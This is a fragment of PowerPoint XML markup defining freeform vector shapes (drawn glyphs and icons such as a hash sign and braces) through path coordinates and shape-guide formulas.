                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="68"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121"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Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="256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Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="2562"/>
                <a:ext cx="82"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Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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2" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="2567"/>
                <a:ext cx="78" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 241"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 113 h 241"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 83 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 43 h 241"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 241"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 18 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 45 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 121 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 156 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 195 h 241"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 224 h 241"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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241"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="241"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="139"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="22" y="102"/>
                      <a:pt x="22" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="15"/>
                      <a:pt x="36" y="1"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64"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3"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="224"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="2567"/>
                <a:ext cx="77" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 198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1" y="139"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>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9" y="112"/>
                      <a:pt x="63" y="113"/>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Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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Freeform 184"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 185"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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Freeform 186"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 187"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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Freeform 188"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 189"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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Freeform 190"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="2564"/>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Freeform 191"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 192"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="255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2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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>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79"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>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8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="99"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="64"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="23"/>
                      <a:pt x="122" y="29"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>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3" y="160"/>
                      <a:pt x="139" y="160"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="149"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="188"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="191"/>
                      <a:pt x="158" y="188"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="179"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="175"/>
                      <a:pt x="172" y="174"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="167"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="153"/>
                      <a:pt x="161" y="152"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="68"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="68"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="66"/>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79"/>
                      <a:pt x="81" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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1"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37"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5"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="177"/>
                      <a:pt x="63" y="177"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="179"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="172"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="194"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="186"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="178"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="163"/>
                      <a:pt x="118" y="159"/>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3"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="128" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="132"/>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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="60"/>
                      <a:pt x="107" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="52"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="48"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="41"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="48"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="31"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="45"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="38"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="72" y="48"/>
                      <a:pt x="72" y="49"/>
